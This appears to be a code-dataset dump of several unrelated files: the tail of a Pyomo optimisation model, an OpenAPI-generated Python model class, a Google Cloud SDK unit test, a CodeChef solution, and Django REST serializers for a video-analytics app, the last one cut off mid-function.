+ 0.00205258*m.i82*m.i93 + 0.00416174*m.i82*m.i94 + 0.0036601*m.i82*m.i95 + 0.00573294*m.i82*
m.i96 + 0.0040347*m.i82*m.i97 + 0.001040396*m.i82*m.i98 + 0.00519918*m.i82*m.i99 + 0.00479088*
m.i82*m.i100 + 0.01497528*m.i83*m.i84 + 0.0032291*m.i83*m.i85 + 0.01011148*m.i83*m.i86 +
0.00471364*m.i83*m.i87 + 0.0246434*m.i83*m.i88 + 0.000996878*m.i83*m.i89 - 0.00262512*m.i83*m.i90
- 0.000789784*m.i83*m.i91 + 0.01304756*m.i83*m.i92 + 0.000531142*m.i83*m.i93 - 0.000443948*m.i83
*m.i94 + 0.00279848*m.i83*m.i95 - 0.0065326*m.i83*m.i96 + 0.01221224*m.i83*m.i97 + 0.01799712*
m.i83*m.i98 + 0.0158385*m.i83*m.i99 + 0.0071337*m.i83*m.i100 + 0.00892568*m.i84*m.i85 +
0.01364388*m.i84*m.i86 + 0.0072533*m.i84*m.i87 + 0.0326884*m.i84*m.i88 + 0.00896504*m.i84*m.i89
+ 0.00823562*m.i84*m.i90 + 0.0125821*m.i84*m.i91 + 0.00787816*m.i84*m.i92 + 0.00249586*m.i84*
m.i93 + 0.00519262*m.i84*m.i94 + 0.01044988*m.i84*m.i95 + 0.01107886*m.i84*m.i96 + 0.0139867*
m.i84*m.i97 + 0.01596046*m.i84*m.i98 + 0.01218826*m.i84*m.i99 + 0.01543212*m.i84*m.i100 +
0.00990954*m.i85*m.i86 + 0.00725662*m.i85*m.i87 + 0.0133432*m.i85*m.i88 + 0.00507396*m.i85*m.i89
+ 0.00930526*m.i85*m.i90 + 0.01462284*m.i85*m.i91 + 0.01055408*m.i85*m.i92 + 0.00190258*m.i85*
m.i93 + 0.00468802*m.i85*m.i94 + 0.0107648*m.i85*m.i95 + 0.01646608*m.i85*m.i96 + 0.01215728*
m.i85*m.i97 + 0.01028698*m.i85*m.i98 + 0.01183266*m.i85*m.i99 + 0.01660366*m.i85*m.i100 +
0.0120373*m.i86*m.i87 + 0.0422718*m.i86*m.i88 + 0.00969238*m.i86*m.i89 + 0.01765146*m.i86*m.i90
+ 0.01429788*m.i86*m.i91 + 0.0124585*m.i86*m.i92 + 0.0040945*m.i86*m.i93 + 0.0046898*m.i86*m.i94
+ 0.01232074*m.i86*m.i95 + 0.0222548*m.i86*m.i96 + 0.0145479*m.i86*m.i97 + 0.0128277*m.i86*m.i98
+ 0.0192244*m.i86*m.i99 + 0.01947568*m.i86*m.i100 + 0.032904*m.i87*m.i88 + 0.0084843*m.i87*m.i89
+ 0.01591916*m.i87*m.i90 + 0.0059879*m.i87*m.i91 + 0.00789644*m.i87*m.i92 + 0.00607862*m.i87*
m.i93 + 0.00667478*m.i87*m.i94 + 0.0088746*m.i87*m.i95 + 0.01963916*m.i87*m.i96 + 0.01115822*
m.i87*m.i97 + 0.0065973*m.i87*m.i98 + 0.01821046*m.i87*m.i99 + 0.01269924*m.i87*m.i100 + 0.04164*
m.i88*m.i89 + 0.01700894*m.i88*m.i90 + 0.0282218*m.i88*m.i91 + 0.0247666*m.i88*m.i92 + 0.00860626
*m.i88*m.i93 + 0.0146832*m.i88*m.i94 + 0.0207292*m.i88*m.i95 + 0.0482992*m.i88*m.i96 + 0.026772*
m.i88*m.i97 + 0.0300758*m.i88*m.i98 + 0.0329128*m.i88*m.i99 + 0.01375988*m.i88*m.i100 +
0.00594302*m.i89*m.i90 + 0.00801468*m.i89*m.i91 + 0.00437824*m.i89*m.i92 + 0.00302882*m.i89*m.i93
+ 0.0041304*m.i89*m.i94 + 0.00803522*m.i89*m.i95 + 0.01620516*m.i89*m.i96 + 0.00836644*m.i89*
m.i97 + 0.01022328*m.i89*m.i98 + 0.0069101*m.i89*m.i99 + 0.00464412*m.i89*m.i100 + 0.01014268*
m.i90*m.i91 + 0.00890216*m.i90*m.i92 + 0.00857494*m.i90*m.i93 + 0.00416286*m.i90*m.i94 +
0.01435266*m.i90*m.i95 + 0.038709*m.i90*m.i96 + 0.01593092*m.i90*m.i97 + 0.0108455*m.i90*m.i98 +
0.0247362*m.i90*m.i99 + 0.0239224*m.i90*m.i100 + 0.01172504*m.i91*m.i92 - 3.25928e-5*m.i91*m.i93
+ 0.00582154*m.i91*m.i94 + 0.01455814*m.i91*m.i95 + 0.0217724*m.i91*m.i96 + 0.01520358*m.i91*
m.i97 + 0.01361584*m.i91*m.i98 + 0.01107608*m.i91*m.i99 + 0.0218082*m.i91*m.i100 + 0.000834202*
m.i92*m.i93 + 0.00361846*m.i92*m.i94 + 0.00964536*m.i92*m.i95 + 0.01621624*m.i92*m.i96 +
0.01139352*m.i92*m.i97 + 0.01032652*m.i92*m.i98 + 0.01663626*m.i92*m.i99 + 0.01551254*m.i92*
m.i100 + 0.00302326*m.i93*m.i94 + 0.0039602*m.i93*m.i95 + 0.0070366*m.i93*m.i96 + 0.0035814*m.i93
*m.i97 + 0.00156313*m.i93*m.i98 + 0.00599576*m.i93*m.i99 + 0.00427812*m.i93*m.i100 + 0.00550244*
m.i94*m.i95 + 0.00558508*m.i94*m.i96 + 0.0059384*m.i94*m.i97 + 0.00357124*m.i94*m.i98 + 0.0064057
*m.i94*m.i99 + 0.00623724*m.i94*m.i100 + 0.0227304*m.i95*m.i96 + 0.01445112*m.i95*m.i97 +
0.01257804*m.i95*m.i98 + 0.01368382*m.i95*m.i99 + 0.01773414*m.i95*m.i100 + 0.0257114*m.i96*m.i97
+ 0.01933344*m.i96*m.i98 + 0.0317874*m.i96*m.i99 + 0.0306278*m.i96*m.i100 + 0.01873902*m.i97*
m.i98 + 0.01912542*m.i97*m.i99 + 0.0219022*m.i97*m.i100 + 0.01388668*m.i98*m.i99 + 0.0207524*
m.i98*m.i100 + 0.0256994*m.i99*m.i100 - m.x101 <= 0)
m.c2 = Constraint(expr= 0.00311438*m.i1 - 0.0196628*m.i2 - 0.0134176*m.i3 - 0.00687102*m.i4 - 0.0147519*m.i5
- 0.0184501*m.i6 - 0.0153449*m.i7 - 0.136908*m.i8 + 0.0173991*m.i9 - 0.00159102*m.i10
- 0.0468625*m.i11 + 0.00163166*m.i12 - 0.00431355*m.i13 - 0.0377972*m.i14 - 0.0149845*m.i15
- 0.0104868*m.i16 + 0.0238532*m.i17 - 0.0104023*m.i18 + 0.0013017*m.i19 - 0.0474684*m.i20
- 0.00693531*m.i21 - 0.00667252*m.i22 - 0.0063525*m.i23 - 0.0205131*m.i24 - 0.00639281*m.i25
- 0.00085931*m.i26 - 0.0202418*m.i27 - 0.0104094*m.i28 - 0.00728791*m.i29 - 0.0650481*m.i30
+ 0.00379685*m.i31 - 0.00873524*m.i32 - 0.0191879*m.i33 - 0.0262863*m.i34 - 0.0148439*m.i35
- 0.0185713*m.i36 - 0.0097821*m.i37 - 0.0169321*m.i38 - 0.0126042*m.i39 + 0.0147787*m.i40
- 0.0212007*m.i41 - 0.0136018*m.i42 - 0.00404129*m.i43 - 0.01093*m.i44 - 0.0138447*m.i45
- 0.00281865*m.i46 - 0.0168853*m.i47 - 0.00610726*m.i48 - 0.00313898*m.i49 - 0.031707*m.i50
+ 0.00048868*m.i51 - 0.0135947*m.i52 - 0.00571196*m.i53 - 0.0158213*m.i54 - 0.00551418*m.i55
+ 7.4592E-5*m.i56 - 0.00372748*m.i57 + 0.00092127*m.i58 - 0.00743836*m.i59 + 0.00559625*m.i60
- 0.0170773*m.i61 - 0.0321089*m.i62 - 0.0230835*m.i63 - 0.0133205*m.i64 - 0.00788571*m.i65
- 0.0339356*m.i66 + 0.00227885*m.i67 - 0.010863*m.i68 - 0.0171333*m.i69 - 0.00515196*m.i70
- 0.0244616*m.i71 - 0.00205996*m.i72 + 0.00281383*m.i73 - 0.00173674*m.i74 - 0.0179568*m.i75
- 0.00659808*m.i76 - 0.0108104*m.i77 - 0.00557398*m.i78 - 0.0427583*m.i79 + 0.00183802*m.i80
- 0.0178204*m.i81 - 0.00328309*m.i82 - 0.0207823*m.i83 - 0.0110875*m.i84 - 0.0128258*m.i85
- 0.00442073*m.i86 - 0.00903049*m.i87 + 0.0203439*m.i88 - 0.0223604*m.i89 - 0.0149007*m.i90
- 0.0193623*m.i91 - 0.013037*m.i92 - 0.00297365*m.i93 - 0.0112456*m.i94 - 0.00469496*m.i95
- 0.00682019*m.i96 - 0.00327006*m.i97 - 0.0258562*m.i98 - 0.0215847*m.i99 - 0.0231142*m.i100
>= 0)
m.c3 = Constraint(expr= 52.59*m.i1 + 28.87*m.i2 + 29.19*m.i3 + 46.55*m.i4 + 24.26*m.i5 + 42.53*m.i6 + 40.53*m.i7
+ 79.56*m.i8 + 108.9*m.i9 + 79.06*m.i10 + 20.15*m.i11 + 35.64*m.i12 + 39.55*m.i13 + 14.32*m.i14
+ 26.41*m.i15 + 62.48*m.i16 + 254.3*m.i17 + 32.42*m.i18 + 24.84*m.i19 + 10.1*m.i20 + 21.2*m.i21
+ 40.25*m.i22 + 17.32*m.i23 + 60.92*m.i24 + 54.73*m.i25 + 78.62*m.i26 + 49.24*m.i27
+ 68.19*m.i28 + 50.3*m.i29 + 3.83*m.i30 + 18.27*m.i31 + 59.67*m.i32 + 12.21*m.i33 + 38.09*m.i34
+ 71.72*m.i35 + 23.6*m.i36 + 70.71*m.i37 + 56.98*m.i38 + 34.47*m.i39 + 10.23*m.i40 + 59.19*m.i41
+ 58.61*m.i42 + 445.29*m.i43 + 131.69*m.i44 + 34.24*m.i45 + 43.11*m.i46 + 25.18*m.i47 + 28*m.i48
+ 19.43*m.i49 + 14.33*m.i50 + 28.41*m.i51 + 74.5*m.i52 + 36.54*m.i53 + 38.99*m.i54 + 43.15*m.i55
+ 199.55*m.i56 + 59.07*m.i57 + 123.55*m.i58 + 20.55*m.i59 + 66.72*m.i60 + 37.95*m.i61
+ 27.62*m.i62 + 23.21*m.i63 + 36.09*m.i64 + 23.09*m.i65 + 46.54*m.i66 + 67.89*m.i67
+ 34.83*m.i68 + 11.96*m.i69 + 45.77*m.i70 + 32.91*m.i71 + 77.37*m.i72 + 21.46*m.i73
+ 53.11*m.i74 + 14.29*m.i75 + 61.13*m.i76 + 32.79*m.i77 + 59.84*m.i78 + 6.59*m.i79 + 14.06*m.i80
+ 55.29*m.i81 + 33.33*m.i82 + 4.24*m.i83 + 23.21*m.i84 + 47.85*m.i85 + 48.99*m.i86 + 57.46*m.i87
+ 28.87*m.i88 + 24.6*m.i89 + 22.26*m.i90 + 28.31*m.i91 + 26.67*m.i92 + 48.1*m.i93 + 28.01*m.i94
+ 64.85*m.i95 + 25.54*m.i96 + 31.47*m.i97 + 18.31*m.i98 + 35.06*m.i99 + 8.06*m.i100 >= 2000)
m.c4 = Constraint(expr= 52.59*m.i1 + 28.87*m.i2 + 29.19*m.i3 + 46.55*m.i4 + 24.26*m.i5 + 42.53*m.i6 + 40.53*m.i7
+ 79.56*m.i8 + 108.9*m.i9 + 79.06*m.i10 + 20.15*m.i11 + 35.64*m.i12 + 39.55*m.i13 + 14.32*m.i14
+ 26.41*m.i15 + 62.48*m.i16 + 254.3*m.i17 + 32.42*m.i18 + 24.84*m.i19 + 10.1*m.i20 + 21.2*m.i21
+ 40.25*m.i22 + 17.32*m.i23 + 60.92*m.i24 + 54.73*m.i25 + 78.62*m.i26 + 49.24*m.i27
+ 68.19*m.i28 + 50.3*m.i29 + 3.83*m.i30 + 18.27*m.i31 + 59.67*m.i32 + 12.21*m.i33 + 38.09*m.i34
+ 71.72*m.i35 + 23.6*m.i36 + 70.71*m.i37 + 56.98*m.i38 + 34.47*m.i39 + 10.23*m.i40 + 59.19*m.i41
+ 58.61*m.i42 + 445.29*m.i43 + 131.69*m.i44 + 34.24*m.i45 + 43.11*m.i46 + 25.18*m.i47 + 28*m.i48
+ 19.43*m.i49 + 14.33*m.i50 + 28.41*m.i51 + 74.5*m.i52 + 36.54*m.i53 + 38.99*m.i54 + 43.15*m.i55
+ 199.55*m.i56 + 59.07*m.i57 + 123.55*m.i58 + 20.55*m.i59 + 66.72*m.i60 + 37.95*m.i61
+ 27.62*m.i62 + 23.21*m.i63 + 36.09*m.i64 + 23.09*m.i65 + 46.54*m.i66 + 67.89*m.i67
+ 34.83*m.i68 + 11.96*m.i69 + 45.77*m.i70 + 32.91*m.i71 + 77.37*m.i72 + 21.46*m.i73
+ 53.11*m.i74 + 14.29*m.i75 + 61.13*m.i76 + 32.79*m.i77 + 59.84*m.i78 + 6.59*m.i79 + 14.06*m.i80
+ 55.29*m.i81 + 33.33*m.i82 + 4.24*m.i83 + 23.21*m.i84 + 47.85*m.i85 + 48.99*m.i86 + 57.46*m.i87
+ 28.87*m.i88 + 24.6*m.i89 + 22.26*m.i90 + 28.31*m.i91 + 26.67*m.i92 + 48.1*m.i93 + 28.01*m.i94
+ 64.85*m.i95 + 25.54*m.i96 + 31.47*m.i97 + 18.31*m.i98 + 35.06*m.i99 + 8.06*m.i100 <= 2200)
| [
"[email protected]"
] | |
fa2af2256e992f5dea361ca6dc8422c6d97e35d1 | 43ab33b2f50e47f5dbe322daa03c86a99e5ee77c | /rcc/models/study_events.py | 73804683abfe9626a9ff78782d4aa06520a3ae77 | [] | no_license | Sage-Bionetworks/rcc-client | c770432de2d2950e00f7c7bd2bac22f3a81c2061 | 57c4a621aecd3a2f3f9faaa94f53b2727992a01a | refs/heads/main | 2023-02-23T05:55:39.279352 | 2021-01-21T02:06:08 | 2021-01-21T02:06:08 | 331,486,099 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,338 | py | # coding: utf-8
"""
nPhase REST Resource
REDCap REST API v.2 # noqa: E501
The version of the OpenAPI document: 2.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from rcc.configuration import Configuration
class StudyEvents(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'study_event': 'list[StudyEvent]'
}
attribute_map = {
'study_event': 'studyEvent'
}
def __init__(self, study_event=None, local_vars_configuration=None): # noqa: E501
"""StudyEvents - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._study_event = None
self.discriminator = None
if study_event is not None:
self.study_event = study_event
@property
def study_event(self):
"""Gets the study_event of this StudyEvents. # noqa: E501
:return: The study_event of this StudyEvents. # noqa: E501
:rtype: list[StudyEvent]
"""
return self._study_event
@study_event.setter
def study_event(self, study_event):
"""Sets the study_event of this StudyEvents.
:param study_event: The study_event of this StudyEvents. # noqa: E501
:type: list[StudyEvent]
"""
self._study_event = study_event
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, StudyEvents):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, StudyEvents):
return True
return self.to_dict() != other.to_dict()
| [
"[email protected]"
] | |
07025217cb00bf91a6ba23c519d15a6c2bff30ad | 82a9077bcb5a90d88e0a8be7f8627af4f0844434 | /google-cloud-sdk/lib/tests/unit/api_lib/compute/instances/ops_agents/exceptions_test.py | 6315b0e3b6f56b2dd728bee1157215665d21febe | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | piotradamczyk5/gcloud_cli | 1ae2553595e569fad6ce84af62b91a7ee5489017 | 384ece11040caadcd64d51da74e0b8491dd22ca3 | refs/heads/master | 2023-01-01T23:00:27.858583 | 2020-10-21T04:21:23 | 2020-10-21T04:21:23 | 290,238,061 | 0 | 0 | null | 2020-10-19T16:43:36 | 2020-08-25T14:31:00 | Python | UTF-8 | Python | false | false | 1,861 | py | # -*- coding: utf-8 -*- #
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit Tests for ops_agents.exceptions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.compute.instances.ops_agents import exceptions
from tests.lib import test_case
import six
ERROR_MESSAGE_1 = 'At most one agent with type [logging] is allowed.'
ERROR_MESSAGE_2 = (
'The agent version [1] is not allowed. Expected values: [latest], '
'[current-major], or anything in the format of '
'[MAJOR_VERSION.MINOR_VERSION.PATCH_VERSION] or [MAJOR_VERSION.*.*].')
ERROR_MESSAGE_3 = (
'An agent can not be pinned to the specific version [5.3.1] when '
'[enable-autoupgrade] is set to true for that agent.')
MULTI_ERROR_MESSAGE = '{} | {} | {}'.format(
ERROR_MESSAGE_1, ERROR_MESSAGE_2, ERROR_MESSAGE_3)
class PolicyValidationMultiErrorTest(test_case.TestCase):
def testErrorMessage(self):
errors = [
exceptions.PolicyValidationError(ERROR_MESSAGE_1),
exceptions.PolicyValidationError(ERROR_MESSAGE_2),
exceptions.PolicyValidationError(ERROR_MESSAGE_3),
]
multi_error = exceptions.PolicyValidationMultiError(errors)
self.assertEqual(MULTI_ERROR_MESSAGE, six.text_type(multi_error))
| [
"[email protected]"
] | |
80ffd316b9bbc8a682e4c8e9e842d3020e7a8472 | 545536daea315e31e01e388326e21a317f73dc6c | /Guddu on a Date.py | f390db81dd0b921ac0e786f7bc984075e63bfca0 | [] | no_license | calkikhunt/CODE_CHEF | 3cd4db7d2231dc31a045645da08c52a78edda6b6 | 81bb90368822bc77e70582ab3eae1a4244e6c80f | refs/heads/master | 2022-04-18T08:43:23.900118 | 2020-01-29T09:31:35 | 2020-01-29T09:31:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 805 | py | t=int(input())
for i in range(t):
ctrcopy=19
n=int(input())
ptr=0
while ptr<(n):
ctr=ctrcopy
check=str(ctrcopy)
doublecheck=str(ctrcopy+19)
sumdigi=0
while ctr>0:
use=ctr%10
ctr=ctr//10
sumdigi+=use
if sumdigi%10==0 and check[len(check)-1]!='0':
ptr+=1
if ptr>=n:
break
ctrcopy+=9
elif sumdigi%10==0 and check[len(check)-1]=='0' and check[0]==doublecheck[0]:
ptr+=1
if ptr>=n:
break
ctrcopy+=19
elif sumdigi%10==0 and check[len(check)-1]=='0' and check[0]!=doublecheck[0]:
ptr+=1
if ptr>=n:
break
ctrcopy+=18
print(ctrcopy)
| [
"[email protected]"
] | |
dac834b379278ddf5e2bc0403e4ac406d9aea1e4 | 4f6ad7cdea2cab5fe89df34f6e5158e4b77837c3 | /server/dvaapp/serializers.py | 746c7a13a61f2e3b5f38663e2f1bf6dacfb29986 | [
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] | permissive | ginusxiao/DeepVideoAnalytics | 7194d83b518976340cd834e4e6a8ab9b164a2e3f | 52c38c729b1a114cc46e641943e3e28a68428e25 | refs/heads/master | 2020-03-18T21:40:31.811272 | 2018-05-29T10:16:20 | 2018-05-29T10:16:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,156 | py | from rest_framework import serializers, viewsets
from django.contrib.auth.models import User
from models import Video, Frame, Region, DVAPQL, QueryResults, TEvent, IndexEntries, \
Tube, Segment, Label, VideoLabel, FrameLabel, RegionLabel, \
SegmentLabel, TubeLabel, TrainedModel, Retriever, SystemState, QueryRegion,\
QueryRegionResults, Worker, TrainingSet
import os, json, logging, glob
from collections import defaultdict
from django.conf import settings
from StringIO import StringIO
from rest_framework.parsers import JSONParser
class UserSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = User
fields = ('url', 'username', 'email', 'password')
extra_kwargs = {
'password': {'write_only': True},
}
# def create(self, validated_data):
# user = User.objects.create_user(**validated_data)
# return user
#
# def update(self, instance, validated_data):
# if 'password' in validated_data:
# password = validated_data.pop('password')
# instance.set_password(password)
# return super(UserSerializer, self).update(instance, validated_data)
class VideoSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = Video
fields = '__all__'
class RetrieverSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = Retriever
fields = '__all__'
class TrainedModelSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = TrainedModel
fields = '__all__'
class TrainingSetSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = TrainingSet
fields = '__all__'
class LabelSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = Label
fields = '__all__'
class FrameLabelSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = FrameLabel
fields = '__all__'
class RegionLabelSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = RegionLabel
fields = '__all__'
class SegmentLabelSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = SegmentLabel
fields = '__all__'
class VideoLabelSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = VideoLabel
fields = '__all__'
class TubeLabelSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = TubeLabel
fields = '__all__'
class FrameLabelExportSerializer(serializers.ModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = FrameLabel
fields = '__all__'
class RegionLabelExportSerializer(serializers.ModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = RegionLabel
fields = '__all__'
class SegmentLabelExportSerializer(serializers.ModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = SegmentLabel
fields = '__all__'
class VideoLabelExportSerializer(serializers.ModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = VideoLabel
fields = '__all__'
class WorkerSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Worker
fields = ('queue_name', 'id')
class TubeLabelExportSerializer(serializers.ModelSerializer):
class Meta:
model = TubeLabel
fields = '__all__'
class FrameSerializer(serializers.HyperlinkedModelSerializer):
media_url = serializers.SerializerMethodField()
def get_media_url(self,obj):
return "{}{}/frames/{}.jpg".format(settings.MEDIA_URL,obj.video_id,obj.frame_index)
class Meta:
model = Frame
fields = ('url','media_url', 'video', 'frame_index', 'keyframe', 'w', 'h', 't',
'name', 'subdir', 'id', 'segment_index')
class SegmentSerializer(serializers.HyperlinkedModelSerializer):
media_url = serializers.SerializerMethodField()
def get_media_url(self,obj):
return "{}{}/segments/{}.mp4".format(settings.MEDIA_URL,obj.video_id,obj.segment_index)
class Meta:
model = Segment
fields = ('video','segment_index','start_time','end_time','metadata',
'frame_count','start_index','start_frame','end_frame','url','media_url', 'id')
class RegionSerializer(serializers.HyperlinkedModelSerializer):
media_url = serializers.SerializerMethodField()
def get_media_url(self,obj):
if obj.materialized:
return "{}{}/regions/{}.jpg".format(settings.MEDIA_URL,obj.video_id,obj.pk)
else:
return None
class Meta:
model = Region
fields = ('url','media_url','region_type','video','user','frame','event','frame_index',
'segment_index','text','metadata','full_frame','x','y','h','w',
'polygon_points','created','object_name','confidence','materialized','png', 'id')
class TubeSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = Tube
fields = '__all__'
class QueryRegionSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = QueryRegion
fields = '__all__'
class SystemStateSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = SystemState
fields = '__all__'
class QueryResultsSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = QueryResults
fields = '__all__'
class QueryRegionResultsSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = QueryRegionResults
fields = '__all__'
class QueryResultsExportSerializer(serializers.ModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = QueryResults
fields = '__all__'
class QueryRegionResultsExportSerializer(serializers.ModelSerializer):
class Meta:
model = QueryRegionResults
fields = '__all__'
class QueryRegionExportSerializer(serializers.ModelSerializer):
query_region_results = QueryRegionResultsExportSerializer(source='queryregionresults_set', read_only=True, many=True)
class Meta:
model = QueryRegion
fields = ('id','region_type','query','event','text','metadata','full_frame','x','y','h','w','polygon_points',
'created','object_name','confidence','png','query_region_results')
class TaskExportSerializer(serializers.ModelSerializer):
query_results = QueryResultsExportSerializer(source='queryresults_set', read_only=True, many=True)
query_regions = QueryRegionExportSerializer(source='queryregion_set', read_only=True, many=True)
class Meta:
model = TEvent
fields = ('started','completed','errored','worker','error_message','video','operation','queue',
'created','start_ts','duration','arguments','task_id','parent','parent_process',
'imported','query_results', 'query_regions', 'id')
class TEventSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = TEvent
fields = '__all__'
class IndexEntriesSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.ReadOnlyField()
class Meta:
model = IndexEntries
fields = '__all__'
class RegionExportSerializer(serializers.ModelSerializer):
class Meta:
model = Region
fields = '__all__'
class FrameExportSerializer(serializers.ModelSerializer):
region_list = RegionExportSerializer(source='region_set', read_only=True, many=True)
class Meta:
model = Frame
fields = ('region_list', 'video', 'frame_index', 'keyframe', 'w', 'h', 't',
'name', 'subdir', 'id', 'segment_index')
class IndexEntryExportSerializer(serializers.ModelSerializer):
class Meta:
model = IndexEntries
fields = '__all__'
class TEventExportSerializer(serializers.ModelSerializer):
class Meta:
model = TEvent
fields = '__all__'
class TubeExportSerializer(serializers.ModelSerializer):
class Meta:
model = Tube
fields = '__all__'
class SegmentExportSerializer(serializers.ModelSerializer):
class Meta:
model = Segment
fields = '__all__'
class DVAPQLSerializer(serializers.HyperlinkedModelSerializer):
tasks = TaskExportSerializer(source='tevent_set', read_only=True, many=True)
query_image_url = serializers.SerializerMethodField()
def get_query_image_url(self,obj):
if obj.process_type == DVAPQL.QUERY:
return "{}queries/{}.png".format(settings.MEDIA_URL,obj.uuid)
else:
return None
class Meta:
model = DVAPQL
fields =('process_type','query_image_url','created', 'user', 'uuid', 'script', 'tasks',
'results_metadata', 'results_available', 'completed','id')
class VideoExportSerializer(serializers.ModelSerializer):
frame_list = FrameExportSerializer(source='frame_set', read_only=True, many=True)
segment_list = SegmentExportSerializer(source='segment_set', read_only=True, many=True)
index_entries_list = IndexEntryExportSerializer(source='indexentries_set', read_only=True, many=True)
event_list = TEventExportSerializer(source='tevent_set', read_only=True, many=True)
tube_list = TubeExportSerializer(source='tube_set', read_only=True, many=True)
frame_label_list = FrameLabelExportSerializer(source='framelabel_set', read_only=True, many=True)
region_label_list = RegionLabelExportSerializer(source='regionlabel_set', read_only=True, many=True)
tube_label_list = TubeLabelExportSerializer(source='tubelabel_set', read_only=True, many=True)
segment_label_list = SegmentLabelExportSerializer(source='segmentlabel_set', read_only=True, many=True)
video_label_list = VideoLabelExportSerializer(source='videolabel_set', read_only=True, many=True)
class Meta:
model = Video
fields = ('name', 'length_in_seconds', 'height', 'width', 'metadata', 'frames', 'created', 'description',
'uploaded', 'dataset', 'uploader', 'segments', 'url','frame_list', 'segment_list',
'event_list', 'tube_list', 'index_entries_list', 'frame_label_list', 'region_label_list',"stream",
'tube_label_list', 'segment_label_list', 'video_label_list')
def serialize_video_labels(v):
serialized_labels = {}
sources = [FrameLabel.objects.filter(video_id=v.pk), VideoLabel.objects.filter(video_id=v.pk),
SegmentLabel.objects.filter(video_id=v.pk), RegionLabel.objects.filter(video_id=v.pk),
TubeLabel.objects.filter(video_id=v.pk)]
for source in sources:
for k in source:
if k.label_id not in serialized_labels:
serialized_labels[k.label_id] = {'id':k.label.id,'name':k.label.name,'set':k.label.set}
return serialized_labels.values()
def import_frame_json(f,frame_index,event_id,video_id,w,h):
regions = []
df = Frame()
df.video_id = video_id
df.event_id = event_id
df.w = w
df.h = h
df.frame_index = frame_index
df.name = f['path']
for r in f.get('regions',[]):
regions.append(import_region_json(r,frame_index,video_id,event_id))
return df,regions
def import_region_json(r,frame_index,video_id,event_id,segment_index=None,frame_id=None):
dr = Region()
dr.frame_index = frame_index
dr.video_id = video_id
dr.event_id = event_id
dr.object_name = r['object_name']
dr.region_type = r.get('region_type', Region.ANNOTATION)
dr.full_frame = r.get('full_frame', False)
if segment_index:
dr.segment_index = segment_index
if frame_id:
dr.frame_id = frame_id
dr.x = r.get('x', 0)
dr.y = r.get('y', 0)
dr.w = r.get('w', 0)
dr.h = r.get('h', 0)
dr.confidence = r.get('confidence', 0.0)
if r.get('text', None):
dr.text = r['text']
else:
dr.text = ""
dr.metadata = r.get('metadata', None)
return dr
def create_event(e, v):
de = TEvent()
de.imported = True
de.started = e.get('started', False)
de.start_ts = e.get('start_ts', None)
de.completed = e.get('completed', False)
de.errored = e.get('errored', False)
de.error_message = e.get('error_message', "")
de.video_id = v.pk
de.operation = e.get('operation', "")
